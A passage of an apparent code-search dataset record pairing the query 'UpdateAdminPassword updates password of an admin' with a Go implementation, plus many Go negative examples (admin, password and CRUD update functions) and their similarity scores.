para %s\", old.Status, r.Status))\n\t\treturn\n\t}\n\n\tupdate := model.Post{\n\t\tBase: model.Base{ID: r.ID},\n\t\tAuthor: r.Author,\n\t\tCategory: r.Category,\n\t\tTags: r.Tags,\n\t\tTitle: r.Title,\n\t\tSlug: r.Slug,\n\t\tContent: r.Content,\n\t\tExcerpt: r.Excerpt,\n\t\tStatus: r.Status,\n\t}\n\n\tvar operator model.User\n\tif err = u.db.Model(&model.User{}).Where(\"uuid = ?\", r.Author).First(&operator).Error; err == nil {\n\t\tupdate.AuthorName = operator.Name\n\t}\n\n\tif err = zaplog.ZLog(u.udb.Update(u.db, &update)); err != nil {\n\t\treturn\n\t}\n\treturn u.udb.View(u.db, r.ID)\n}", "func (marketApp *MarketPlaceApp) LockAdmin() error {\n return marketApp.Lock(3)\n}", "func (marketApp *MarketPlaceApp) LockAdmin() error {\n return marketApp.Lock(3)\n}", "func (k *KapalRepoMysql) UpdateData(id int, kapal *model.Kapal) error {\n\tqry := \"update kapal set kode_kapal = ?, muatan= ?, status = ? where kapal_id = ?\"\n\n\ttx, err := k.db.Begin()\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn fmt.Errorf(\"[KapalRepoMysql.UpdateData] Error when begin transaction : %w\", err)\n\t}\n\n\t_, err = tx.Exec(qry, kapal.Kode, kapal.Muatan, kapal.Status, id)\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn fmt.Errorf(\"[KapalRepoMysql.UpdateData] Error when Exec '\"+qry+\"' : %w\", err)\n\t}\n\n\terr = tx.Commit()\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn fmt.Errorf(\"[KapalRepoMysql.UpdateData.Commit] Error when commiting '\"+qry+\"' : %w\", err)\n\t}\n\treturn nil\n}", "func IsAdmin(ee engine.Exchange) sknet.HandlerFunc {\n\treturn func(c *sknet.Context) error {\n\t\tvar rlt *pp.EmptyRes\n\t\tfor {\n\t\t\treq := pp.UpdateCreditReq{}\n\t\t\tif err := c.BindJSON(&req); err != nil {\n\t\t\t\tlogger.Error(err.Error())\n\t\t\t\trlt = pp.MakeErrResWithCode(pp.ErrCode_WrongRequest)\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tif !ee.IsAdmin(req.GetPubkey()) {\n\t\t\t\tlogger.Error(\"not admin\")\n\t\t\t\trlt = pp.MakeErrResWithCode(pp.ErrCode_UnAuthorized)\n\t\t\t\tbreak\n\t\t\t}\n\t\t\treturn c.Next()\n\t\t}\n\t\treturn c.Error(rlt)\n\t}\n}", "func (c *Cruder) update(request *CrudRequest) {\n\tnewValues := request.GetValues()\n\tfilters := request.GetFilters()\n\n\tsetClause := make([]interface{}, len(newValues))\n\twhereClause := make([]interface{}, len(filters))\n\n\tfor i, value := range newValues {\n\t\tsetClause[i] = value.Value\n\t}\n\n\tfor i, filter := range filters {\n\t\twhereClause[i] = filter.Value\n\t}\n\n\targuments := append(setClause, whereClause...)\n\n\tstatement := c.getPreparedStatement(UPDATE, request)\n\n\t_, err := statement.Exec(arguments...)\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (room *Room) PromoteAdmin(userToPromote, issuer string) error {\n\tif err := room.checkUserPermissions(issuer); err != nil {\n\t\treturn err\n\t}\n\n\troom.Admins = append(room.Admins, userToPromote)\n\treturn nil\n}", "func (orm *ORM) UpdateAdminRole(ctx context.Context, adminID string, role string) (bool, error) {\n\tvar _Admin models.Admin\n\n\terr := orm.DB.DB.First(&_Admin, \"id = ?\", adminID).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\treturn false, errors.New(\"AdminNotFound\")\n\t}\n\t_Admin.Role = role\n\torm.DB.DB.Save(&_Admin)\n\treturn true, nil\n\n}", "func (ac *ArticleController) Edit(w http.ResponseWriter, r *http.Request) {\n\t// u := userContext(r.Context())\n\t// debug: dummy user\n\tctx := r.Context()\n\tu := models.UserContext(ctx)\n\tif u.IsAdmin {\n\t\tp := httptreemux.ContextParams(ctx)\n\n\t\tidParam, _ := strconv.Atoi(p[\"id\"])\n\t\tif idParam <= 0 { // conversion failed or bad input\n\t\t\tsendJSON(\"Input not valid\", http.StatusBadRequest, w)\n\t\t\treturn\n\t\t}\n\n\t\tid := uint(idParam)\n\t\ttitle := r.FormValue(\"title\")\n\t\ttext := r.FormValue(\"text\")\n\n\t\ta := models.ArticleUpdate(id, title, text)\n\t\tif a.ID == 0 { // Something went wrong\n\t\t\tsendJSON(\"Error: impossible to edit article\", http.StatusInternalServerError, w)\n\t\t\treturn\n\t\t}\n\n\t\turl := r.URL.EscapedPath()\n\t\tcache.RemoveURL(url)\n\n\t\tw.Header().Set(\"Content-Location\", url)\n\t\tsendJSON(a, http.StatusOK, w)\n\t} else {\n\t\tsendJSON(\"You are not admin\", http.StatusForbidden, w)\n\t}\n}", "func UpdateAdminLoginTime(adminID string, admin *Admin) error {\n\toid, _ := primitive.ObjectIDFromHex(adminID)\n\t_, err := adminCollection.UpdateOne(context.TODO(), bson.M{\"_id\": oid}, bson.D{\n\t\tprimitive.E{Key: \"$currentDate\", Value: bson.D{\n\t\t\tprimitive.E{Key: \"last_login_at\", Value: true},\n\t\t}},\n\t})\n\tgetAdminByID(oid).Decode(&admin)\n\treturn err\n}", "func updateVolunteer(c *gin.Context) {\n\n\tvar vol Volunteer\n\temail := c.Params.ByName(\"email\")\n\n\t//Checks json data\n\tif err := c.BindJSON(&vol); err != nil {\n\t\tcreateBadRequestResponse(c, err)\n\t\treturn\n\t}\n\n\t//Gets volunteer from database\n\tvar oldvol Volunteer\n\tif err := db.Where(\"email = ?\", email).First(&oldvol).Error; err != nil {\n\t\tcreateNotFoundResponse(c)\n\t\treturn\n\t}\n\t//Sets data which could not be changed (I am still not sure if url path have to be with :email )\n\tvol.ID = oldvol.ID\n\tvol.Email = oldvol.Email\n\tif vol.Password == \"\" {\n\t\tvol.Password = oldvol.Password\n\t}\n\n\t//Checks if data belongs to the user\n\tif !volunteerAuth(c, &vol) {\n\t\treturn\n\t}\n\n\t//Saves Volunteer to the database\n\tif err := db.Save(&vol).Error; err != nil {\n\t\tcreateStatusConflictResponse(c)\n\t\treturn\n\t}\n\t//change password in auth map\n\tauthMap[vol.Email] = vol.Password\n\tc.JSON(200, vol)\n\n}", "func (_EtherDelta *EtherDeltaTransactor) ChangeAdmin(opts *bind.TransactOpts, admin_ common.Address) (*types.Transaction, error) {\n\treturn _EtherDelta.contract.Transact(opts, \"changeAdmin\", admin_)\n}", "func (_Contract *ContractTransactor) ChangeAdmin(opts *bind.TransactOpts, newAdmin common.Address) (*types.Transaction, error) {\n\treturn _Contract.contract.Transact(opts, \"changeAdmin\", newAdmin)\n}", "func AdminHandler(c buffalo.Context) error {\n\tadminR.HTMLLayout = \"main.html\"\n\tc.Set(\"adminpage\", makeAdminPage(\"Dashboard\", \"get stuff done!\", \"Index\"))\n\treturn c.Render(200, adminR.HTML(\"index.html\"))\n}", "func Update(writer http.ResponseWriter, request *http.Request) {\n\tsp := getByID(request.FormValue(\"id\"))\n\tfmt.Println(sp)\n\ttemplate_html.ExecuteTemplate(writer, \"Update\", sp)\n}", "func (_Bindings *BindingsCaller) Admin(opts *bind.CallOpts) (common.Address, error) {\n\tvar (\n\t\tret0 = new(common.Address)\n\t)\n\tout := ret0\n\terr := _Bindings.contract.Call(opts, out, \"admin\")\n\treturn *ret0, err\n}", "func (m *Module) InternalUpdate(ctx context.Context, dbAlias, project, col string, req *model.UpdateRequest) error {\n\tm.RLock()\n\tdefer m.RUnlock()\n\n\t// validate the update operation\n\tdbType, err := m.getDBType(dbAlias)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif err := helpers.ValidateUpdateOperation(ctx, dbAlias, dbType, col, req.Operation, req.Update, req.Find, m.schemaDoc); err != nil {\n\t\treturn err\n\t}\n\n\tcrud, err := m.getCrudBlock(dbAlias)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err := crud.IsClientSafe(ctx); err != nil {\n\t\treturn err\n\t}\n\n\t// Adjust where clause\n\tif err := helpers.AdjustWhereClause(ctx, dbAlias, model.DBType(dbType), col, m.schemaDoc, req.Find); err != nil {\n\t\treturn err\n\t}\n\n\t// Perform the update operation\n\tn, err := crud.Update(ctx, col, req)\n\n\t// Invoke the metric hook if the operation was successful\n\tif err == nil {\n\t\tm.metricHook(m.project, dbAlias, col, n, model.Update)\n\t}\n\n\treturn err\n}", "func update(w http.ResponseWriter, r *http.Request) {\r\n\tif r.Method != \"PUT\" {\r\n\t\thttp.Error(w, \"404 not found.\", http.StatusNotFound)\r\n\t\treturn\r\n\t}\r\n\tid, _ := strconv.ParseInt(r.URL.Query().Get(\"id\"), 10, 64)\r\n\tcontents := &content{\r\n\t\tID: id,\r\n\t\tvalue: r.PostFormValue(\"value\"),\r\n\t\tcompleted: r.PostFormValue(\"completed\"),\r\n\t}\r\n\t//fmt.Println(user)\r\n\tquery := \"UPDATE public.item SET completed=$3,value=$2 WHERE id = $1;\"\r\n\t_, err = db.Exec(query, contents.ID, contents.value,contents.completed)\r\n\tif err != nil {\r\n\t\tpanic(err)\r\n\t}\r\n\tjson.NewEncoder(w).Encode(contents)\r\n}", "func (m *MockActivityHandler) AdminUpdateByID(w http.ResponseWriter, r *http.Request) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"AdminUpdateByID\", w, r)\n}", "func memberUpdate(db *sql.DB, client *chef.Client) {\n\t// Get a unique list of all the users\n\tusers, err := db.Query(\"SELECT user_name FROM org_groups;\")\n\tif err != nil {\n\t\tpanic(err.Error()) // proper error handling instead of panic in your app\n\t}\n\tvar members []string\n\tfor users.Next() {\n\t\tvar name string\n\t\terr = users.Scan(&name)\n\t\tif err != nil {\n\t\t\tpanic(err.Error()) // proper error handling instead of panic in your app\n\t\t}\n\t\tmembers = append(members, name)\n\t}\n\tmembers = co.Unique(members)\n\tusers.Close()\n\tstmtInsMember, err := db.Prepare(\"INSERT INTO members (user_name, email, display_name) VALUES( ?, ?, ? )\")\n\tif err != nil {\n\t\tpanic(err.Error()) // proper error handling instead of panic in your app\n\t}\n // transaction - begin, delete existing users, add replacement data\n\ttx, err := db.Begin()\n\t_, err = db.Query(\"DELETE FROM members;\")\n\tfor _, member := range members {\n\t\t// Extract information for each user\n\t\tmemberInfo := getMember(client, member)\n\t\t// Update the data base with a new set of user records\n\t\t_, err = stmtInsMember.Exec(member, memberInfo.Email, memberInfo.DisplayName)\n\t\tif err != nil {\n\t\t\tpanic(err.Error()) // proper error handling instead of panic in your app\n\t\t}\n\t}\n stmtInsMember.Close()\n\ttx.Commit()\n}", "func (_EtherDelta *EtherDeltaSession) Admin() (common.Address, error) {\n\treturn _EtherDelta.Contract.Admin(&_EtherDelta.CallOpts)\n}", "func (svc *AdminSecretService) Update(s *library.Secret) (*library.Secret, *Response, error) {\n\t// set the API endpoint path we send the request to\n\tu := \"/api/v1/admin/secret\"\n\n\t// library Secret type we want to return\n\tv := new(library.Secret)\n\n\t// send request using client\n\tresp, err := svc.client.Call(\"PUT\", u, s, v)\n\n\treturn v, resp, err\n}", "func (c *Controller) manageRollingUpdate(admin submarine.AdminInterface, cluster *rapi.SubmarineCluster, rCluster *submarine.Cluster, nodes submarine.Nodes) (bool, error) {\n\treturn true, nil\n}", "func (h Handler) Update(w http.ResponseWriter, r *http.Request, p httprouter.Params) {\n\tdata := postData{}\n\terr := json.NewDecoder(r.Body).Decode(&data)\n\tif err != nil {\n\t\th.log.Println(err)\n\t\tres := response.Resp{\n\t\t\tStatus: \"error\",\n\t\t\tData: \"There was an problem, please try again\",\n\t\t}\n\t\tresponse.Writer(w, res)\n\t\treturn\n\t}\n\tif data.Name == \"\" || data.Desc == \"\" {\n\t\tres := response.Resp{\n\t\t\tStatus: \"error\",\n\t\t\tData: \"Empty post values\",\n\t\t}\n\t\tresponse.Writer(w, res)\n\t\treturn\n\t}\n\tid, err := strconv.ParseUint(p.ByName(\"id\"), 10, 64)\n\tif err != nil {\n\t\th.log.Println(err)\n\t\tres := response.Resp{\n\t\t\tStatus: \"error\",\n\t\t\tData: \"There was an problem, please try again\",\n\t\t}\n\t\tresponse.Writer(w, res)\n\t\treturn\n\t}\n\ttodo, err := h.m.Update(id, model.Todo{Name: data.Name, Description: data.Desc})\n\tif err != nil {\n\t\th.log.Println(err)\n\t\tres := response.Resp{\n\t\t\tStatus: \"error\",\n\t\t\tData: \"There was an problem, please try again\",\n\t\t}\n\t\tresponse.Writer(w, res)\n\t\treturn\n\t}\n\tres := response.Resp{\n\t\tStatus: \"succes\",\n\t\tData: todo,\n\t}\n\tresponse.Writer(w, res)\n}", "func Update(hechizoUpdate *entity.Hechizo) error {\n\n\tlog.Println(\"---- Consulta Update ----\")\n\tdb := dbUtils.Connect()\n\tdefer dbUtils.Close(db)\n\n\tquery := fmt.Sprintf(\"UPDATE %v SET NOMBRE=?, MANA=? WHERE ID=?\", tabla)\n\n\tupdateQuery, error := db.Exec(query, hechizoUpdate.Nombre, hechizoUpdate.Mana, hechizoUpdate.Id)\n\tif error != nil {\n\t\tlog.Println(error)\n\t\treturn error\n\t}\n\n\trows, _ := updateQuery.RowsAffected()\n\tlog.Printf(\"Se ha actualizado el item de base de datos %v, registros afectados: %v\", hechizoUpdate, rows)\n\n\treturn nil\n}", "func (_EtherDelta *EtherDeltaCaller) Admin(opts *bind.CallOpts) (common.Address, error) {\n\tvar (\n\t\tret0 = new(common.Address)\n\t)\n\tout := ret0\n\terr := _EtherDelta.contract.Call(opts, out, \"admin\")\n\treturn *ret0, err\n}", "func getAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\tvar id bson.ObjectId\n\tif idParam := e.QueryParam(\"id\"); idParam != \"\" && bson.IsObjectIdHex(idParam) {\n\t\tid = bson.ObjectIdHex(idParam)\n\t}\n\tuuid, err := uuid.FromString(e.QueryParam(\"uuid\"))\n\tif !id.Valid() && err != nil {\n\t\treturn fmt.Errorf(\"Bad parameters\")\n\t}\n\n\ta := models.Admin{}\n\tif id.Valid() {\n\t\terr = db.C(\"Admins\").FindId(id).One(&a)\n\t} else {\n\t\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": uuid}).One(&a)\n\t}\n\tif err != nil {\n\t\treturn e.NoContent(http.StatusNotFound)\n\t}\n\treturn e.JSON(http.StatusOK, a)\n}" ]
[ "0.75725096", "0.7215969", "0.6647906", "0.6647906", "0.64647335", "0.6423737", "0.62350154", "0.61032325", "0.61016893", "0.6100485", "0.60433316", "0.60104555", "0.60084134", "0.59471935", "0.5941222", "0.59372747", "0.5907692", "0.5901883", "0.58410764", "0.5800188", "0.57688445", "0.5768104", "0.573405", "0.57224977", "0.57216", "0.57209307", "0.5714579", "0.56773955", "0.5676789", "0.5674282", "0.56618905", "0.5656376", "0.56302816", "0.5609093", "0.5601998", "0.55975604", "0.55699897", "0.55677617", "0.55608314", "0.5556928", "0.55552775", "0.5537475", "0.54868734", "0.54723454", "0.5469515", "0.5459383", "0.5447718", "0.5441696", "0.54263633", "0.5424815", "0.5413686", "0.5401396", "0.5377696", "0.5360758", "0.5357897", "0.5351963", "0.53417766", "0.5339482", "0.5328211", "0.53268635", "0.53124416", "0.5309153", "0.52929074", "0.52899826", "0.5278696", "0.52663755", "0.52492213", "0.52455276", "0.5243648", "0.5243081", "0.52404594", "0.523805", "0.5213708", "0.5209085", "0.5202525", "0.5202525", "0.5199981", "0.51994944", "0.51987875", "0.5184999", "0.5178677", "0.5160897", "0.51596916", "0.515374", "0.514843", "0.5147595", "0.51400435", "0.5133225", "0.5130447", "0.51226664", "0.5122458", "0.5116801", "0.5114532", "0.5114391", "0.51125115", "0.51108855", "0.51033926", "0.51019835", "0.5100651", "0.50966746" ]
0.6539474
4
UpdateAdminPassword updates password of an admin
func (orm *ORM) UpdateAdminPassword(ctx context.Context, adminID string, oldPassword string, newPassword string) (bool, error) { var _Admin models.Admin err := orm.DB.DB.First(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return false, errors.New("AdminNotFound") } isSame := validatehash.ValidateCipher(oldPassword, _Admin.Password) if isSame == false { return false, errors.New("OldPasswordIncorrect") } _Admin.Password = newPassword orm.DB.DB.Save(&_Admin) return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ChangeAdminPassword(client *gophercloud.ServiceClient, id, newPassword string) (r ActionResult) {\n\tb := map[string]interface{}{\n\t\t\"changePassword\": map[string]string{\n\t\t\t\"adminPass\": newPassword,\n\t\t},\n\t}\n\tresp, err := client.Post(actionURL(client, id), b, nil, nil)\n\t_, r.Header, r.Err = gophercloud.ParseResponse(resp, err)\n\treturn\n}", "func AdminUserPwdUpdate(context *gin.Context,\n\tcacheDB int,\n\tsqlHandle,\n\tadminUserID,\n\tadminUserPwd,\n\tadminUserAginPwd string) *protocol.Response {\n\n\tvar pwd, oldPwd string\n\tvar err error\n\tvar oldUser *models.AdminUser\n\tvar errResult protocol.Response\n\n\tif !util.VerifyPasswordFormat(pwd) {\n\t\tlog.Debug(\"Modify admin user password format error:%s\", pwd)\n\t\terrResult = code.SpawnErrPwdFormat()\n\t\tgoto fail\n\t}\n\n\tif pwd != adminUserAginPwd {\n\t\tlog.Debug(\"Modify admin user password first!=second\")\n\t\terrResult = code.SpawnErrPwdAgin()\n\t\tgoto fail\n\t}\n\n\toldUser, err = database.AdminUserQueryPwd(sqlHandle, adminUserID)\n\tif err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tpwd, err = aes.Encrypt(oldUser.Secret, adminUserPwd)\n\n\tif err = database.AdminUserPwdUpdate(sqlHandle, adminUserID, pwd); err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tif oldPwd, err = database.GetRdsOnlineAdminPassword(cacheDB, adminUserID); err == nil {\n\t\tif oldPwd != pwd {\n\t\t\tif err = database.WithRdsOnlineAdminPwd(cacheDB, adminUserID, pwd); err != nil {\n\t\t\t\tlog.Debug(\"Modify admin user online password error:%s\", err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\nfail:\n\treturn &errResult\n}", "func UserUpdatePassword(id int, n string) {\n\tvar i int\n\ti = GetIndexOfUser(id)\n\tuserList[i].uPassword = n\n}", "func UpdateKubeAdminUserPassword(kubeAdminPassword string, ocConfig oc.Config, bundle *bundle.CrcBundleInfo) error {\n\t// In case of cluster started from stopped state.\n\tif kubeAdminPassword == \"\" {\n\t\treturn nil\n\t}\n\thashDeveloperPasswd, err := hashBcrypt(\"developer\")\n\tif err != nil {\n\t\treturn err\n\t}\n\n\thashKubeAdminPasswd, err := hashBcrypt(kubeAdminPassword)\n\tif err != nil {\n\t\treturn err\n\t}\n\tbase64Data := getBase64(hashDeveloperPasswd, hashKubeAdminPasswd)\n\n\tcmdArgs := []string{\"patch\", \"secret\", \"htpass-secret\", \"-p\",\n\t\tfmt.Sprintf(`'{\"data\":{\"htpasswd\":\"%s\"}}'`, base64Data),\n\t\t\"-n\", \"openshift-config\", \"--type\", \"merge\"}\n\t_, stderr, err := ocConfig.RunOcCommandPrivate(cmdArgs...)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Failed to update kubeadmin password %v: %s\", err, stderr)\n\t}\n\tif err := bundle.UpdateKubeadminPassword(kubeAdminPassword); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (c *Config) UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tctx := r.Context()\n\n\tvar payload updatePasswordPayload\n\tif err := bjson.ReadJSON(&payload, r); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := valid.Raw(&payload); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu, err := c.UserStore.GetUserByID(ctx, payload.UserID)\n\tif err != nil {\n\t\tbjson.HandleError(w, errors.E(\n\t\t\terrors.Op(\"handlers.UpdatePassword\"),\n\t\t\terr,\n\t\t\thttp.StatusBadRequest))\n\n\t\treturn\n\t}\n\n\tif err := u.VerifyPasswordResetMagicLink(\n\t\tc.Magic,\n\t\tpayload.UserID,\n\t\tpayload.Timestamp,\n\t\tpayload.Signature,\n\t); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tif err := magic.TooOld(payload.Timestamp); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tu.ChangePassword(payload.Password)\n\tu.IsLocked = false\n\tu.AddEmail(u.Email)\n\tu.DeriveProperties()\n\n\tif err := c.UserStore.Commit(ctx, u); err != nil {\n\t\tbjson.HandleError(w, err)\n\t\treturn\n\t}\n\n\tbjson.WriteJSON(w, u, http.StatusOK)\n}", "func UpdatePassword(ex db.Execer, userid int64, pass string) error {\n\tif err := validPassword(pass); err != nil {\n\t\treturn err\n\t}\n\thashed, err := bcrypt.GenerateFromPassword([]byte(pass), bcrypt.DefaultCost)\n\tif err != nil {\n\t\treturn err\n\t}\n\tstr := `\n\tINSERT INTO user_passwords (user_id, password)\n\tSELECT user_id, password FROM users WHERE user_id = ?\n\t`\n\t_, err = ex.Exec(str, userid)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tstr = \"UPDATE users SET password = ? WHERE user_id = ?\"\n\t_, err = ex.Exec(str, hashed, userid)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (n *User) UpdatePassword(p string) error {\n\tpasswordHash, err := bcrypt.GenerateFromPassword([]byte(p), 10)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfmt.Println(p, \"=>\", string(passwordHash))\n\tn.PasswordHash = string(passwordHash)\n\treturn nil\n}", "func UpdatePassword(db sqlx.Execer, id int64, newpassword string) error {\n\tif err := ValidatePassword(newpassword); err != nil {\n\t\treturn errors.Wrap(err, \"validation error\")\n\t}\n\n\tpwHash, err := hashPassword(newpassword)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Add the new user.\n\t_, err = db.Exec(\"update \\\"user\\\" set password_hash = $1, updated_at = now() where id = $2\",\n\t\tpwHash, id)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"update error\")\n\t}\n\n\tlog.WithFields(log.Fields{\n\t\t\"id\": id,\n\t}).Info(\"user password updated\")\n\treturn nil\n\n}", "func (rep rep_users) UpdatePassword(id uint64, passwordHash string) error {\n\tstatement, erro := rep.db.Prepare(\"UPDATE usuarios SET senha = ? WHERE id = ?\")\n\n\tif erro != nil {\n\t\treturn erro\n\t}\n\n\tdefer statement.Close()\n\n\tif _, erro = statement.Exec(passwordHash, id); erro != nil {\n\t\treturn erro\n\t}\n\n\treturn nil\n}", "func UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tuserID := r.Context().Value(utils.TokenContextKey).(string)\n\ttempAccout := &receivePasswordInfo{}\n\terr := json.NewDecoder(r.Body).Decode(tempAccout)\n\tif err != nil {\n\t\tutils.JSONRespnseWithErr(w, &utils.ErrPostDataNotCorrect)\n\t\treturn\n\t}\n\tmessage := models.UpdatePassword(userID, tempAccout.Password, tempAccout.NewPassword)\n\tutils.JSONResonseWithMessage(w, message)\n}", "func UpdatePassword(newPW string, userID int) {\n\tsqlStmt := `UPDATE tblUsers\n\t\t\t\tSET fldPassword = ?\n\t\t\t\tWHERE fldID = ?;`\n\n\tstmt, err := globals.Db.Prepare(sqlStmt)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer stmt.Close()\n\n\t// Execute insert and replace with actual values.\n\t_, err = stmt.Exec(newPW, userID)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n}", "func ApiSettingsPassword(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tif !lib.IsLoggedIn(r) {\n\t\tSendJsonMessage(w, http.StatusUnauthorized, false, \"Unauthorized.\")\n\t\treturn\n\t}\n\n\t// Get data from Request\n\tr.ParseForm()\n\tvalue := r.Form.Get(\"password\")\n\n\t// Simple Validation\n\tif value == \"\" {\n\t\tSendJsonMessage(w, http.StatusBadRequest, false, \"Unable to process your Request: Submit a valid value.\")\n\t\treturn\n\t}\n\n\t// Update Password\n\tadmin := lib.Admin{}\n\terr := admin.ChangePassword(value)\n\tif err != nil {\n\t\tSendJsonMessage(w, http.StatusInternalServerError, false, \"Unable to process your Request: \"+err.Error())\n\t\treturn\n\t}\n\tSendJsonMessage(w, http.StatusOK, true, \"\")\n}", "func (o *LdapProvider) SetAdminPassword(v string) {\n\to.AdminPassword = &v\n}", "func (u *User) UpdatePassword(db *pg.DB) error {\n\tpass, err := bcrypt.GenerateFromPassword([]byte(u.Password), bcrypt.DefaultCost)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn err\n\t}\n\n\tu.Password = string(pass)\n\t_, err = db.Model(u).WherePK().Update()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (a *API) changePassword(w http.ResponseWriter, req *http.Request) {\n\tvars := mux.Vars(req)\n\tusername := vars[\"user\"]\n\tif username == config.Get().AdminAuthentication.Username {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusForbidden,\n\t\t\terr: errors.New(\"Cannot change administrator's password\"),\n\t\t})\n\t\treturn\n\t}\n\tif err := req.ParseForm(); err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: err,\n\t\t})\n\t\treturn\n\t}\n\tpassword := req.Form.Get(\"password\")\n\tif password == \"\" {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: errors.New(\"Incorrect change password form\"),\n\t\t})\n\t\treturn\n\t}\n\t// Check an user is existing\n\tpath := common.Path(model.DefaultUsersPrefix, common.Hash(username, crypto.MD5))\n\tresp, err := a.etcdcli.DoGet(path)\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: err,\n\t\t})\n\t\treturn\n\t}\n\tif len(resp.Kvs) == 0 {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusBadRequest,\n\t\t\terr: errors.New(\"Unknown user\"),\n\t\t})\n\t\treturn\n\t}\n\t// Hash for new password\n\thashedpw, err := common.GenerateBcryptHash(password, config.Get().PasswordHashingCost)\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: errors.Wrap(err, \"Something went wrong\"),\n\t\t})\n\t\treturn\n\t}\n\n\tuser := &model.User{\n\t\tUsername: username,\n\t\tPassword: hashedpw,\n\t}\n\t_ = user.Validate()\n\tr, _ := json.Marshal(&user)\n\t_, err = a.etcdcli.DoPut(path, string(r))\n\tif err != nil {\n\t\ta.respondError(w, apiError{\n\t\t\tcode: http.StatusInternalServerError,\n\t\t\terr: errors.Wrap(err, \"Unable to put a key-value pair into etcd\"),\n\t\t})\n\t\treturn\n\t}\n\ta.respondSuccess(w, http.StatusOK, nil)\n}", "func UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tr.ParseForm()\n\tpasswords, err := json.Marshal(map[string]string{\n\t\t\"now\": r.FormValue(\"now\"),\n\t\t\"new\": r.FormValue(\"new\"),\n\t})\n\tif err != nil {\n\t\tresponses.JSON(w, http.StatusBadRequest, responses.ErrorAPI{Err: err.Error()})\n\t\treturn\n\t}\n\n\tcookie, _ := cookies.Read(r)\n\tuserID, _ := strconv.ParseUint(cookie[\"id\"], 10, 64)\n\n\turl := fmt.Sprintf(\"%s/users/%d/change-password\", config.APIURL, userID)\n\tresponse, err := requests.RequestsWithAuthentication(r, http.MethodPost, url, bytes.NewBuffer(passwords))\n\tif err != nil {\n\t\tresponses.JSON(w, http.StatusInternalServerError, responses.ErrorAPI{Err: err.Error()})\n\t\treturn\n\t}\n\tdefer response.Body.Close()\n\n\tif response.StatusCode >= 400 {\n\t\tresponses.TreatStatusCode(w, response)\n\t\treturn\n\t}\n\n\tresponses.JSON(w, response.StatusCode, nil)\n}", "func (h *auth) UpdatePassword(c echo.Context) error {\n\t// Filter params\n\tvar params service.UpdatePasswordParams\n\tif err := c.Bind(&params); err != nil {\n\t\tlog.Println(\"Could not get parameters:\", err)\n\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"Could not get parameters.\"))\n\t}\n\n\tparams.UserAgent = c.Request().UserAgent()\n\tparams.Session = currentSession(c)\n\n\t// Check CurrentPassword presence.\n\tif params.CurrentPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnauthorized,\n\t\t\tsferror.New(\"Your current password is required to change your password. Please update your application if you do not see this option.\"))\n\t}\n\n\t// Check NewPassword presence.\n\tif params.NewPassword == \"\" {\n\t\treturn c.JSON(http.StatusUnauthorized,\n\t\t\tsferror.New(\"Your new password is required to change your password. Please update your application if you do not see this option.\"))\n\t}\n\n\tuser := currentUser(c)\n\n\t// When id parameter passed, check it's the same like in bearer token.\n\tif c.Param(\"id\") != \"\" && c.Param(\"id\") != user.ID {\n\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"The given ID is not the user's one.\"))\n\t}\n\n\tservice := service.NewUser(h.db, h.sessions, params.APIVersion)\n\tpassword, err := service.Password(user, params)\n\tif err != nil {\n\t\tif h.db.IsAlreadyExists(err) {\n\t\t\treturn c.JSON(http.StatusUnauthorized, sferror.New(\"The email you entered is already taken. Please try again.\"))\n\t\t}\n\t\treturn err\n\t}\n\n\treturn c.JSON(http.StatusOK, password)\n}", "func (db *gjDatabase) updateUserPassword(email, password string) error {\n\tcryptPw, 